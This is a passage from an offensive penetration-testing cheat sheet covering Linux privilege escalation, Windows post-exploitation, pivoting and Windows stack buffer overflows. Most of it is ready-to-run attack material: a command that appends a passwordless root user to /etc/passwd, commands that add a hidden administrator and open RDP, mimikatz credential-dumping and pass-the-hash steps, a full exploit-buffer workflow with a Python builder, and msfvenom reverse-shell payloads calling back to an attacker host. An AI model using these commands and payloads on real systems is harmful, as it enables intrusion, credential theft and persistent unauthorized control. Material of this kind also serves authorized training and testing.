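        lhs, rhs = line.split("=", 1)
        user = lhs.split()[0]
        rhs = rhs.strip()
        runas = "root"                      # sudo's default when (runas) is omitted
        if rhs.startswith("("):
            runas, rhs = rhs[1:].split(")", 1)
        rhs = rhs.strip()
        cmds = rhs.split(":")[-1].strip()   # drop NOPASSWD:/SETENV: style tags
        rules.append((user, runas, "NOPASSWD" in rhs, cmds))
    return rules

def demo():
    """Constructed tree: a SUID binary, a sticky world-writable tmp, a writable config."""
    root = tempfile.mkdtemp()
    bin_dir = os.path.join(root, "bin")
    os.mkdir(bin_dir); os.chmod(bin_dir, 0o755)
    tmp_dir = os.path.join(root, "tmp")
    os.mkdir(tmp_dir); os.chmod(tmp_dir, 0o1777)     # like /tmp
    suid_bin = os.path.join(bin_dir, "ping")
    open(suid_bin, "w").close(); os.chmod(suid_bin, 0o4755)
    conf = os.path.join(root, "app.conf")
    open(conf, "w").close(); os.chmod(conf, 0o666)
    return find_special_bits(root), find_world_writable(root)

if __name__ == "__main__":
    special, writable = demo()
    print("SUID:", special["suid"])
    print("sticky dirs:", special["sticky_dirs"])
    print("world-writable:", writable)
    print(parse_sudoers("root ALL=(ALL) ALL\njohn ALL = (root) NOPASSWD: /usr/bin/scp"))
```

On a real host the interesting output is the SUID list filtered against what the distribution ships by default, the world-writable entries that a root process later reads or executes (cron scripts, config files, library paths), and any NOPASSWD rule whose command can spawn a shell or write files.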
(10) Add a UID 0 user (group root) to /etc/passwd
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
(empty password field; where passwordless logins are refused, put a hash from "openssl passwd -1" in the second field instead)
(11) Enumeration tools
LinEnum.sh
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
linprivchecker.py
linpostexp/linprivchecker.py at master · reider-roque/linpostexp · GitHub
(12) Linux local exploits
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
(13) Precompiled exploits
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/xairy/linux-kernel-exploitation
IV. Post-Exploitation
1. proof.txt
(1) Linux
cat /root/proof.txt
(2) Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
2. Windows
(1) Add an RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
(2) Enable RDP
Via the registry
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Open the firewall
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
(3) RDP connection
rdesktop -g 1024x768 x.x.x.x
(4) Passwords and hashes (mimikatz)
Extract passwords, keys, PINs and tickets from LSASS memory
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token (to SYSTEM)
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM (run token::elevate first; the SAM hive is only readable as SYSTEM)
privilege::debug
log sekurlsa.log
lsadump::sam
Windows Credentials Editor (WCE):
Security tool that extracts cleartext passwords and NTLM hashes from a Windows host. Requires administrator rights.
Amplia Security - Research - Windows Credentials Editor (WCE)
C:\> wce -w
(5) Network
Network connections
netstat -ano
Hosts file
C:\WINDOWS\System32\drivers\etc\hosts
Firewall configuration
netsh firewall show state
netsh firewall show config
netsh dump
(6) PowerShell tools
Empire
https://github.com/EmpireProject/Empire
PowerSploit
https://github.com/PowerShellMafia/PowerSploit
3. Linux
Upgrade to a TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash') (from inside a Python interpreter)
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'
V. Lateral Movement
1. Local port forwarding
Forward a local port to a remote host:port through the gateway
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
2. Remote port forwarding
Expose a port on the gateway that forwards back to a host:port reachable from the local side
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Windows: expose the Windows host's local port 445 as port 444 on Kali
Start ssh on Kali first
service ssh start
Download plink.exe and run
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445
(tools on Kali pointed at 127.0.0.1:444 now reach the Windows host's SMB service)
3. Dynamic port forwarding
-D makes SSH act as a SOCKS (4/5) proxy: a single SSH tunnel through which any application (e.g. via proxychains) forwards its traffic to the remote side. Unlike local forwarding it is not tied to one destination host:port.
ssh -D <local proxy port> -p <remote port> <target>
VI. Buffer Overflows
1. Basics
The x86 architecture has 8 general-purpose 32-bit registers that hold data or addresses pointing elsewhere in memory:
EBP (base pointer)
ESP (stack pointer)
EAX (accumulator)
EBX (base)
ECX (counter)
EDX (data)
EDI (destination index)
ESI (source index)
EIP: extended instruction pointer. It cannot be written directly by ordinary instructions and holds the address of the next instruction to execute (it tells the CPU what to do next); control-flow instructions and the saved return address on the stack are what change it, which is why overwriting that return address matters.
ESP: extended stack pointer. Points to the top of the stack (the lowest address in use) at any given moment.
EBP: extended base pointer. Points to the base of the current stack frame, at a higher address than ESP.
2. Bad characters
0x00  NULL (\0)
0x09  Tab (\t)
0x0a  Line Feed (\n)
0x0c  Form Feed (\f)
0x0d  Carriage Return (\r)
0xff  often filtered as well
Generate the bad-character list in bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
Generate the bad-character list in Python
''.join('\\x{:02x}'.format(i) for i in range(1,256))
3. Windows
General steps
(1) Fuzz until the application crashes and note that EIP is overwritten with A's (0x41).
(2) Generate a unique pattern with pattern_create.rb and send it to the target
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
(3) Note the 4 bytes that overwrite EIP (in hex)
(4) Compute the offset of those 4 bytes with pattern_offset.rb
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
(5) Send a new buffer to confirm control of EIP: it should now read 42424242 (B's). Add this to the PoC and note the ESP and EIP values
buffer = "A" * 2606 + "B" * 4 + "C" * 90
(6) Check whether there is more usable space after the overwrite (raise the buffer from 2700 to 3500 bytes and see whether the extra bytes land in memory). Run morespace.py -> right-click ESP -> Follow in Dump. Add to the PoC and check how many C's are present
buffer = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
(7) Check for bad characters (0x00 to 0xff). Paste the whole range into the buffer and see where the ESP dump is truncated or altered (right-click ESP -> Follow in Dump). Remove the offending byte and repeat until the full sequence is intact
(8) If we cannot jump directly into our buffer, find a reliable address in memory holding an instruction such as JMP ESP: jumping there then jumps to whatever ESP points at, which is our buffer. mona.py lists the modules that can be searched for such a return address (pick one without DEP/ASLR/rebase whose address range contains no bad characters)
!mona modules
Check which memory protections (Rebase, SafeSEH, ASLR, NXCompat) apply and note a suitable DLL (right-hand column).
(9) Opcode for JMP ESP
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp
The result is "\xff\xe4"
(10) Use mona to find a JMP ESP address in the DLL chosen in step 8. Pick one that contains no bad characters.
!mona find -s "\xff\xe4" -m <dllname>.dll
(11) Pause the debugger and follow the address (black arrow on the right: "Go to expression"). Confirm the disassembly pane (top left) shows JMP ESP
(12) Set a breakpoint to check that execution reaches the JMP ESP: top-left pane -> right-click -> Go to expression; top-left pane -> right-click -> Breakpoint -> Toggle (F2)
Add to the PoC (the address found in step 10, written little-endian)
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
Run the PoC and check that the breakpoint is hit (message at the bottom of the debugger).
(13) Generate the reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
(14) Add the shellcode to the script
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Add more NOPs if needed (the encoder's decoder stub needs some room on the stack)
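Ever step of the procedure above that does not need the debugger is byte arithmetic: the cyclic pattern and offset lookup, the bad-character run from section 2, the little-endian packing of the JMP ESP address, and the assembly of the final buffer. The following is an added example (not from the original notes and not Metasploit's code) that reproduces those pieces in Python so each value can be checked independently; it uses the offset 2606, the EIP value 39694438 and the address 0x5f4a358f from the steps above.

```python
import string
import struct

# Added example (not from the original notes or from Metasploit): the byte-level
# parts of the workflow above, done in Python so they can be checked without the
# debugger: the cyclic pattern behind pattern_create.rb / pattern_offset.rb, the
# bad-character sequence from section 2, little-endian packing of the JMP ESP
# address, and assembly of the final buffer. The offset 2606 and the address
# 0x5f4a358f are the ones used in the steps above.

_CYCLE = "".join(a + b + c
                 for a in string.ascii_uppercase
                 for b in string.ascii_lowercase
                 for c in string.digits)          # Aa0Aa1...Zz9, 20280 chars

def pattern_create(length):
    """Same sequence as pattern_create.rb -l <length> (repeats past 20280)."""
    reps = length // len(_CYCLE) + 1
    return (_CYCLE * reps)[:length]

def pattern_offset(value, length=2700):
    """Offset of the 4 bytes seen in EIP. Accepts the hex shown by the debugger
    (e.g. '39694438', which is '8Di9' in memory order) or the literal string.
    Returns -1 when the value is not part of the pattern."""
    pattern = pattern_create(length)
    candidates = [value]
    if len(value) == 8 and all(ch in string.hexdigits for ch in value):
        # The debugger shows EIP as a number; the bytes in memory are reversed.
        candidates.insert(0, bytes.fromhex(value)[::-1].decode("ascii", "replace"))
    for needle in candidates:
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return -1

def badchars(exclude=b""):
    """0x01..0xff minus the bytes already known to be bad, for pasting into the buffer."""
    skip = set(exclude)
    return bytes(b for b in range(1, 256) if b not in skip)

def pack_address(addr):
    """32-bit address as the little-endian bytes that go into the buffer."""
    return struct.pack("<I", addr)

def address_is_clean(addr, bad):
    """True if no byte of the packed address is in the bad-character set."""
    return not any(b in bad for b in pack_address(addr))

def build_buffer(offset, ret_addr, shellcode, nops=8, total=None):
    """A*offset + JMP ESP address + NOP sled + shellcode, padded with C's to
    'total' so the crash length stays the same as during fuzzing."""
    buf = b"A" * offset + pack_address(ret_addr) + b"\x90" * nops + shellcode
    if total is not None and len(buf) < total:
        buf += b"C" * (total - len(buf))
    return buf

if __name__ == "__main__":
    bad = b"\x00\x0a\x0d"
    print("offset:", pattern_offset("39694438"))
    print("jmp esp bytes:", pack_address(0x5f4a358f))
    print("address clean:", address_is_clean(0x5f4a358f, bad))
    print("badchar run:", badchars(bad).hex())
    print("buffer length:", len(build_buffer(2606, 0x5f4a358f, b"\xcc" * 351, total=2700)))
```

The offset lookup reverses the EIP value before searching because the debugger prints the register as a number while the pattern sits in memory byte by byte; forgetting that is the usual reason pattern_offset reports nothing. Checking the return address against the bad-character set before using it saves a debugging round when the chosen DLL lives at an address containing 0x00 or 0x0a.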
Worked examples
FuzzySecurity | ExploitDev: Part 2
Exploiting Simple Buffer Overflows on Win32
GitHub - justinsteven/dostackbufferoverflowgood
buffer-overflow/win-buff-overflow at master · SiowCY/buffer-overflow · GitHub
VII. Miscellaneous
1. Reverse shells shipped with Kali
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/webshells/php/simple-backdoor.php
2. Msfvenom
(1) List all payloads
msfvenom -l payloads
(2) Listener
msfconsole
use exploit/multi/handler
set payload <the payload used with msfvenom>
set lhost x.x.x.x
set lport 4444
exploit
(3) Windows
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 EXITFUNC=thread -b "\x00" -f python -v shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > shell.asp
(4) Java (JSP / WAR, e.g. for Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > shell.jsp
3. Linux tips
(1) vi
Remove the first 5 characters of every line
:%s/^.\{5}//
Remove the last 5 characters of every line
:%s/.\{5}$//
(2) AWK
Remove duplicate lines
awk '!seen[$0]++' file